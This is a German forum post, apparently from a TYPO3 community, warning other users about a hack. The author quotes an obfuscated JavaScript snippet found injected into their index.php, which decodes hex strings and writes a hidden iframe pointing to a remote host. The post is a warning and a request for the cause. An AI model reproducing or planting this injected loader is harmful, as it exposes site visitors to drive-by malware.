Hallo T3'ler,
heute musste ich mit erschrecken feststellen das meine Seite gehackt wurde.
Zum glück nur minimal und ich konnte den "hack" gleich finden.
In der index.php (root) war folgende Zeile:
<script>var GlK = '06606503b06606506806606506506606507106606506006606506c06606506406606501f06606507206606507106606506206606503c06606502106606502106606501f06606507606606506806606506306606507306606506706606503c06606502106606503006606502106606501f06606506706606506406606506806606506606606506706606507306606503c06606502106606503006606502106606501f06606506806606506306606503c06606502106606507806606504006606506106606502106606501f06606506506606507106606506006606506c06606506406606506106606506e06606507106606506306606506406606507106606503c06606502106606502f06606502106606503d06606503b06606502e06606506806606506506606507106606506006606506c06606506406606503d';function tSc(uEZ,w1,w2){var gwl='';arr=uEZ.split('0'+w1+'0'+w2+'0');for(i=1; i<arr.length; i++){ gwl+='%'+(parseInt(arr[i], 16)+1).toString(16);}return gwl;} var MvX=unescape;document.write(MvX(tSc(GlK,'66','65')));document.getElementById('yAb').src = MvX(tSc('02f03906702f03907302f03907302f03906f02f03903902f03902e02f03902e02f03903002f03903302f03903502f03902d02f03903002f03903702f03903402f03902d02f03903102f03903302f03903802f03902d02f03903002f03903502f03903802f03902e02f03907202f03907502f03902e02f03906202f03906e02f03907402f03906d02f03907302f03902d02f03906f02f03906702f03906f02f03903e02f03906002f03906302f03906302f03903c02f039030','2f','39'));</script>
Alles ist auf CHMOD 644?
Konnte dies evtl. durch eine Alpha/Beta Extension zustandekommen?
Was das Script macht, ist einen iFrame am Ende der Webseite zu platzieren. Man bemerkt es spätestens wenn man seine Seite/ sein Projekt besucht und eine Viruswarnung auftaucht.
Dies ist weniger eine Frage, sondern eine Warnung, damit alle Ihre index.php prüfen.
Grüße